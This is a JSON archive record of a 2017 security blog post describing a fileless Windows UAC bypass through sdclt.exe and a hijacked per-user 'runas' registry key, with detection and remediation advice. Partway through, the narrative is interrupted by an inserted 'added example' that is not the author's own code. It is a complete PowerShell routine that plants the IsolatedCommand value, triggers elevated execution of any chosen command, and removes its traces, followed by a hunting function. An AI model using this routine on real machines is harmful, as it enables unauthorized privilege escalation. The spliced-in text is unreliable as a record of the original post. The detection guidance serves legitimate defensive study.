{
	"id": "549de05a-5402-485f-a3c2-c06f98dfea4e",
	"created_at": "2026-04-06T00:06:58.950527Z",
	"updated_at": "2026-04-10T03:31:17.784258Z",
	"deleted_at": null,
	"sha1_hash": "18d43d2b04a4efc38eb518de747dc704c6c17daa",
	"title": "“Fileless” UAC Bypass using sdclt.exe",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 811164,
	"plain_text": "“Fileless” UAC Bypass using sdclt.exe\r\nPublished: 2017-03-17 · Archived: 2026-04-05 15:28:13 UTC\r\nRecently, I published a post on using App Paths with sdclt.exe to bypass UAC. You may remember that the App Path bypass required a file on disk. Since sdclt.exe is already public, I figured I would publish another bypass using that binary, only this one is fileless. I mentioned it in my previous post, but the Vault7 leak confirms that bypassing UAC is operationally interesting, even to nation states, as several UAC bypasses/notes were detailed in the dump. As far as public bypasses go, definitely check out the UACME project by @hfiref0x, which has a nice collection of public techniques.\r\nIn newer versions of Windows, Microsoft has shown that they are taking the bypasses seriously. This has motivated me to spend a little more time on UAC and the different methods around it.\r\nAs some of you may know, there are some Microsoft-signed binaries that auto-elevate due to their manifest: the manifest carries an autoElevate element set to true, and the binary must be Microsoft-signed and live in a trusted directory such as System32 for the elevation to happen silently. You can read more about these binaries and their manifests here. While searching for more of these auto-elevating binaries with the SysInternals tool “sigcheck” (sigcheck -m prints a binary's embedded manifest), I came across “sdclt.exe” and verified that it auto-elevates due to its manifest:\r\n*Note: This only works on Windows 10 builds current at the time of writing (March 2017). The manifest for sdclt.exe in Windows 7 has the requestedExecutionLevel set to “AsInvoker”, preventing auto-elevation when started from medium integrity.\r\nAs I mentioned in my last post, a common technique used to investigate loading behavior on Windows is to use SysInternals Process Monitor to analyze how a process behaves when executed. 
I often work some basic binary analysis into my investigative process in order to see what other opportunities exist.\r\nOne of the first things I tend to do when analyzing an auto-elevate binary is to look for any potential command line arguments. I use IDA for this, but you can use your preferred tool. When peering into sdclt.exe, I noticed a few arguments that stood out due to interesting keywords:\r\nThese were interesting as sdclt.exe is set to auto-elevate in its manifest anyway. Looking at sdclt.exe in IDA, it checks if the argument matches “/kickoffelev”. If it does, it sets the full path for “sdclt.exe”, adds “/KickOffJob” as a parameter and then calls SxShellExecuteWithElevate.\r\nFollowing that path, SxShellExecuteWithElevate starts “%systemroot%\\system32\\sdclt.exe /kickoffjob” with the “Runas” verb. This is programmatically doing what the “Run as administrator” context-menu option does. The security-relevant detail is how the verb is resolved: ShellExecute looks up the file type's shell\\runas\\command handler in HKEY_CLASSES_ROOT, which is a merged view in which HKEY_CURRENT_USER\\Software\\Classes takes precedence over HKEY_LOCAL_MACHINE\\Software\\Classes, and the per-user half is writable from medium integrity without any prompt.\r\nThe next step is to run “sdclt.exe /Kickoffelev” with procmon running. After going through the output, we see the trusty “shell\\<verb>\\command” registry search path in the HKEY_CURRENT_USER hive.\r\nThe next step was to add those keys and see if our binary and parameters of choice would execute. Unfortunately, nothing executed after adding the keys and starting “sdclt.exe /kickoffelev”. 
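As an added example that is not the post's own code and not its Invoke-SDCLTBypass.ps1, the PowerShell below carries the whole chain described in this post through to the end: it writes the per-user runas verb handler for exefile, including the IsolatedCommand value that the procmon trace turns up, launches sdclt.exe /kickoffelev, and removes the key again; a second function hunts the loaded user hives for exactly the artifact the post recommends alerting on. The function names, the three-second wait and the sweep over HKEY_USERS are this example's own assumptions, as is a Windows 10 build from the time of the post.

```powershell
# Added example, not the post's Invoke-SDCLTBypass.ps1: the sdclt.exe /kickoffelev verb hijack
# end to end, plus a hunt for the registry value it leaves behind. Assumptions: a Windows 10
# build current in March 2017, a medium-integrity session of a local Administrators member,
# and UAC below 'Always Notify'. Function names and the wait time are this example's own.

# The per-user verb handler the auto-elevated sdclt.exe resolves through the merged HKCR
# view, where HKCU\\Software\\Classes takes precedence over HKLM\\Software\\Classes.
$VerbKey = 'HKCU:\\Software\\Classes\\exefile\\shell\\runas\\command'

function Invoke-SdcltKickOff {
    param(
        # Full path plus arguments, e.g. 'C:\\Windows\\System32\\cmd.exe /c notepad.exe'
        [Parameter(Mandatory)] [string] $Command
    )
    # Write the value sdclt.exe actually reads: IsolatedCommand, not the key's default value.
    New-Item -Path $VerbKey -Force | Out-Null
    New-ItemProperty -Path $VerbKey -Name 'IsolatedCommand' -Value $Command `
        -PropertyType String -Force | Out-Null
    try {
        # /kickoffelev makes sdclt.exe relaunch itself with the 'runas' verb; that verb lookup
        # hits exefile\\shell\\runas\\command and runs IsolatedCommand at high integrity.
        $sdclt = Join-Path $env:SystemRoot 'System32\\sdclt.exe'
        Start-Process -FilePath $sdclt -ArgumentList '/kickoffelev'
        Start-Sleep -Seconds 3   # let the elevated relaunch consume the key before removal
    }
    finally {
        # Always remove the hijack: left behind, it would redirect every later
        # 'Run as administrator' of any .exe by this user into the payload.
        Remove-Item -Path 'HKCU:\\Software\\Classes\\exefile\\shell\\runas' -Recurse -Force `
            -ErrorAction SilentlyContinue
    }
}

function Find-RunasVerbHijack {
    # Hunt every loaded user hive for per-user runas handlers under Software\\Classes.
    # A populated IsolatedCommand on exefile is the sdclt.exe tell, and a per-user runas
    # handler for exefile is rare enough in legitimate software that each one deserves a look.
    $hits = @()
    $hives = Get-ChildItem -Path 'Registry::HKEY_USERS' -ErrorAction SilentlyContinue |
        Where-Object { $_.PSChildName -notlike '*_Classes' }   # <SID>\\Software\\Classes links to these
    foreach ($hive in $hives) {
        $classes = Join-Path $hive.PSPath 'Software\\Classes'
        if (-not (Test-Path $classes)) { continue }
        foreach ($progid in Get-ChildItem -Path $classes -ErrorAction SilentlyContinue) {
            $cmdKey = Join-Path $progid.PSPath 'shell\\runas\\command'
            if (-not (Test-Path $cmdKey)) { continue }
            $props = Get-ItemProperty -Path $cmdKey -ErrorAction SilentlyContinue
            foreach ($name in '(default)', 'IsolatedCommand') {
                if ($props.$name) {
                    $hits += [pscustomobject]@{
                        UserSid = $hive.PSChildName
                        ProgId  = $progid.PSChildName
                        Value   = $name
                        Command = $props.$name
                    }
                }
            }
        }
    }
    $hits
}

# Reproduce the post's validation run, then confirm nothing is left behind:
# Invoke-SdcltKickOff -Command 'C:\\Windows\\System32\\cmd.exe /c notepad.exe'
# Find-RunasVerbHijack | Format-Table -AutoSize
```

Run Find-RunasVerbHijack from an elevated session if you want to see other users' hives; from medium integrity it only reads your own. The hunt reports both the default value and IsolatedCommand because the same key hijacks the ordinary “Run as administrator” verb too, so the whole key, not just one value name, is the thing to watch.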
Looking back in procmon, our keys are queried, but sdclt.exe is actually looking for an additional value within the “command” key: “IsolatedCommand”.\r\nWe can then add our payload and parameters in a string (REG_SZ) value within the “command” key called “IsolatedCommand”:\r\nThis is the same bug (minus the IsolatedCommand portion) that was used in the eventvwr.exe “fileless” UAC bypass. You can read about the eventvwr.exe bypass and the specific registry keys used here. Notice that instead of “shell\\open\\command”, we now see “shell\\runas\\command”. This is because sdclt.exe was invoked (again) using the “RunAs” verb via SxShellExecuteWithElevate.\r\nAfter adding our payload as the “IsolatedCommand” value, running “sdclt.exe /KickOffElev” will execute our payload (and any parameters) in a high-integrity context:\r\nTo demonstrate this technique, you can find a script here: https://github.com/enigma0x3/Misc-PowerShell-Stuff/blob/master/Invoke-SDCLTBypass.ps1\r\nThe script takes a full path to your payload and any parameters. “C:\\Windows\\System32\\cmd.exe /c notepad.exe” is a good one to validate. It will automatically add the keys, start “sdclt.exe /kickoffelev” and then clean up.\r\nThis particular technique can be remediated by setting the UAC level to “Always Notify” (auto-elevation is disabled at that level, so sdclt.exe prompts like any other elevation) or by removing the current user from the local Administrators group (a standard user has no split token, so there is nothing to elevate to without credentials). Further, if you would like to monitor for this attack, you could alert on new registry entries at HKCU:\\Software\\Classes\\exefile\\shell\\runas\\command\\IsolatedCommand. Sysmon registry events (Event ID 12 for key creation, Event ID 13 for a value being set) scoped to \\Software\\Classes\\exefile\\shell\\runas\\command are one way to get that telemetry; watch the whole key rather than only the value name, and alert on creation rather than relying on a later scan, because cleaning the key up again is part of the technique.\r\nCheers,\r\nMatt\r\nSource: https://enigma0x3.net/2017/03/17/fileless-uac-bypass-using-sdclt-exe/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MITRE"
	],
	"references": [
		"https://enigma0x3.net/2017/03/17/fileless-uac-bypass-using-sdclt-exe/"
	],
	"report_names": [
		"fileless-uac-bypass-using-sdclt-exe"
	],
	"threat_actors": [
		{
			"id": "23dfc9f5-1862-4510-a6ae-53d8e51f17b1",
			"created_at": "2024-05-01T02:03:08.146025Z",
			"updated_at": "2026-04-10T02:00:03.67072Z",
			"deleted_at": null,
			"main_name": "PLATINUM TERMINAL",
			"aliases": [
				"APT-C-39",
				"Longhorn",
				"The Lamberts",
				"Vault7"
			],
			"source_name": "Secureworks:PLATINUM TERMINAL",
			"tools": [
				"AfterMidnight",
				"Assassin",
				"Marble Framework"
			],
			"source_id": "Secureworks",
			"reports": null
		}
	],
	"ts_created_at": 1775434018,
	"ts_updated_at": 1775791877,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/18d43d2b04a4efc38eb518de747dc704c6c17daa.pdf",
		"text": "https://archive.orkl.eu/18d43d2b04a4efc38eb518de747dc704c6c17daa.txt",
		"img": "https://archive.orkl.eu/18d43d2b04a4efc38eb518de747dc704c6c17daa.jpg"
	}
}